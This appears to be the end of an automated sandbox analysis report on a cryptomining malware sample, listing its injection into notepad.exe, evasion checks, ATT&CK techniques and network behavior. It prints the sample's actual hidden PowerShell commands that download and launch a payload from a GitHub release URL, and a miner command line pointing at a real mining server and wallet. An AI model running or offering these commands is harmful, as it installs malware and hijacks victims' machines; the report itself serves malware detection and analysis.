                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
                          Source: svchost.exe, 0000001C.00000002.2128335034.00000190B6213000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                          Source: svchost.exe, 0000001C.00000002.2128721217.00000190B6264000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                          Source: svchost.exe, 0000001C.00000002.2128574647.00000190B624B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: svchost.exe, 0000001C.00000002.2128574647.00000190B624B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: notepad.exe, 00000002.00000002.2128850608.000001C007B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2129985206.000001D63422F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2131963776.000001D639854000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                          Source: svchost.exe, 0000001C.00000002.2128411466.00000190B622B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                          Source: powershell.exe, 00000010.00000002.1575190410.000002239F320000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW2011%SystemRoot%\system32\mswsock.dll
                          Source: svchost.exe, 0000001C.00000002.2128206897.00000190B6202000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                          Source: svchost.exe, 0000001C.00000002.2128721217.00000190B6264000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                          Source: powershell.exe, 00000005.00000002.1370357211.000001BF3C508000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
                          Source: svchost.exe, 0000001C.00000002.2128721217.00000190B6264000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                          Source: svchost.exe, 0000001C.00000002.2128411466.00000190B622B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: svchost.exe, 0000001C.00000002.2128876995.00000190B628C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: svchost.exe, 0000001C.00000002.2128574647.00000190B624B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: win_init.exe, 00000021.00000002.1805850040.00000277C9DDB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: esFK2gm.exe, 00000000.00000002.2137652124.0000017C510DC000.00000004.00000020.00020000.00000000.sdmp, win_init.exe, 0000001E.00000002.1621864850.000001B6AE1CF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll99
                          Source: C:\Users\user\Desktop\esFK2gm.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug

                          HIPS / PFW / Operating System Protection Evasion

                          Source: C:\Windows\System32\notepad.exe | Network Connect: 45.144.212.77 3333
                          Source: C:\Users\user\Desktop\esFK2gm.exe | Memory allocated: C:\Windows\System32\notepad.exe base: 7FF786570000 protect: page execute and read and write
                          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'"
                          Source: C:\Users\user\Desktop\esFK2gm.exe | Memory written: C:\Windows\System32\notepad.exe base: 7FF786570000 value starts with: 4D5A
                          Source: C:\Users\user\Desktop\esFK2gm.exe | Thread register set: target process: 7076
                          Source: C:\Users\user\Desktop\esFK2gm.exe | Section unmapped: C:\Windows\System32\notepad.exe base address: 7FF786570000
                          Source: C:\Users\user\Desktop\esFK2gm.exe | Memory written: C:\Windows\System32\notepad.exe base: 7FF786570000
                          Source: C:\Users\user\Desktop\esFK2gm.exe | Memory written: C:\Windows\System32\notepad.exe base: 7FF786571000
                          Source: C:\Users\user\Desktop\esFK2gm.exe | Memory written: C:\Windows\System32\notepad.exe base: 7FF78699C000
                          Source: C:\Users\user\Desktop\esFK2gm.exe | Memory written: C:\Windows\System32\notepad.exe base: 7FF786B41000
                          Source: C:\Users\user\Desktop\esFK2gm.exe | Memory written: C:\Windows\System32\notepad.exe base: 7FF786DF1000
                          Source: C:\Users\user\Desktop\esFK2gm.exe | Memory written: C:\Windows\System32\notepad.exe base: 7FF786E1C000
                          Source: C:\Users\user\Desktop\esFK2gm.exe | Memory written: C:\Windows\System32\notepad.exe base: 7FF786E1D000
                          Source: C:\Users\user\Desktop\esFK2gm.exe | Memory written: C:\Windows\System32\notepad.exe base: 7FF786E20000
                          Source: C:\Users\user\Desktop\esFK2gm.exe | Memory written: C:\Windows\System32\notepad.exe base: 7FF786E22000
                          Source: C:\Users\user\Desktop\esFK2gm.exe | Memory written: C:\Windows\System32\notepad.exe base: 7FF786E28000
                          Source: C:\Users\user\Desktop\esFK2gm.exe | Memory written: C:\Windows\System32\notepad.exe base: 2EE6A6A010
                          Source: C:\Users\user\Desktop\esFK2gm.exe | Process created: C:\Windows\System32\notepad.exe --donate-level 2 -o 45.144.212.77:3333 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=25
                          Source: C:\Users\user\Desktop\esFK2gm.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"
                          Source: C:\Users\user\Desktop\esFK2gm.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"
                          Source: C:\Users\user\Desktop\esFK2gm.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"
                          Source: C:\Users\user\Desktop\esFK2gm.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"
                          Source: C:\Users\user\Desktop\esFK2gm.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"
                          Source: C:\Users\user\Desktop\esFK2gm.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"
                          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'"
                          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden"
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\win_init.exe "C:\Users\user\AppData\Roaming\win_init.exe"
                          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'"
                          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden"
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\win_init.exe "C:\Users\user\AppData\Roaming\win_init.exe"
                          Source: unknown | Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min powershell.exe -windowstyle hidden -executionpolicy bypass -command "invoke-webrequest -uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -outfile 'c:\users\user\appdata\roaming\win_init.exe'"
                          Source: unknown | Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min powershell.exe -windowstyle hidden -executionpolicy bypass -command "invoke-webrequest -uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -outfile 'c:\users\user\appdata\roaming\win_init.exe'"
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\svchost.exe | Queries volume information: C: VolumeInformation
                          Source: C:\Windows\System32\svchost.exe | Queries volume information: C: VolumeInformation
                          Source: C:\Windows\System32\svchost.exe | Queries volume information: C: VolumeInformation
                          Source: C:\Users\user\Desktop\esFK2gm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                          Lowering of HIPS / PFW / Operating System Security Settings

                          Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATE
                          Source: svchost.exe, 0000001D.00000002.2130060153.000001F188D02000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
                          Source: svchost.exe, 0000001D.00000002.2130060153.000001F188D02000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                          MITRE ATT&CK Matrix

                          Techniques are listed per tactic, in the order of the report's matrix rows; a number in front of a technique is the count shown next to it in the report.

                          • Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                          • Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                          • Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                          • Execution: 11 Windows Management Instrumentation; 1 Shared Modules; 12 Command and Scripting Interpreter; 3 PowerShell; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                          • Persistence: 1 DLL Side-Loading; 21 Registry Run Keys / Startup Folder; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                          • Privilege Escalation: 1 DLL Side-Loading; 611 Process Injection; 21 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                          • Defense Evasion: 1 Disable or Modify Tools; 1 Obfuscated Files or Information; 1 Install Root Certificate; 1 Software Packing; 1 DLL Side-Loading; 11 Masquerading; 1 Modify Registry; 151 Virtualization/Sandbox Evasion; 611 Process Injection
                          • Credential Access: 11 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                          • Discovery: 2 File and Directory Discovery; 24 System Information Discovery; 1 Query Registry; 251 Security Software Discovery; 2 Process Discovery; 151 Virtualization/Sandbox Evasion; 1 Application Window Discovery; System Owner/User Discovery; Network Sniffing
                          • Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                          • Collection: 1 Archive Collected Data; 11 Input Capture; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                          • Command and Control: 1 Web Service; 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; 1 Proxy; Application Layer Protocol; Web Protocols
                          • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                          • Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                          Behavior Graph (ID: 1632653, Sample: esFK2gm.exe, Startdate: 08/03/2025, Architecture: WINDOWS, Score: 100)

                          Start
                            DNS: pastebin.com; objects.githubusercontent.com; github.com
                            Signatures: Sigma detected: Xmrig; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 9 other signatures; Connects to a pastebin service (likely for C&C) (pastebin.com)
                            esFK2gm.exe
                              Network: github.com 140.82.121.4, 443, 49681, 49703 GITHUBUS United States; objects.githubusercontent.com 185.199.108.133, 443, 49682, 49692 FASTLYUS Netherlands; pastebin.com 104.20.4.235, 443, 49683, 49684 CLOUDFLARENETUS United States
                              Signatures: Installs new ROOT certificates; Found strings related to Crypto-Mining; Found Tor onion address; 7 other signatures
                              notepad.exe
                                Network: 45.144.212.77, 3333, 49691 HPC-MVM-ASHU Ukraine (Detected Stratum mining protocol)
                                Signatures: System process connects to network (likely due to code injection or exploit); Query firmware table information (likely to detect VMs)
                              tasklist.exe
                                conhost.exe
                              5 other processes
                                5 other processes
                            cmd.exe
                              Signatures: Suspicious powershell command line found; Bypasses PowerShell execution policy
                              powershell.exe
                                Network: 140.82.121.3, 443, 49690, 49697 GITHUBUS United States
                                Dropped: C:\Users\user\AppData\Roaming\win_init.exe, PE32+
                                Signatures: Powershell drops PE file
                                conhost.exe
                              conhost.exe
                            cmd.exe
                              powershell.exe
                                win_init.exe
                                  Signatures: Multi AV Scanner detection for dropped file; Found Tor onion address
                                conhost.exe
                              conhost.exe
                            9 other processes
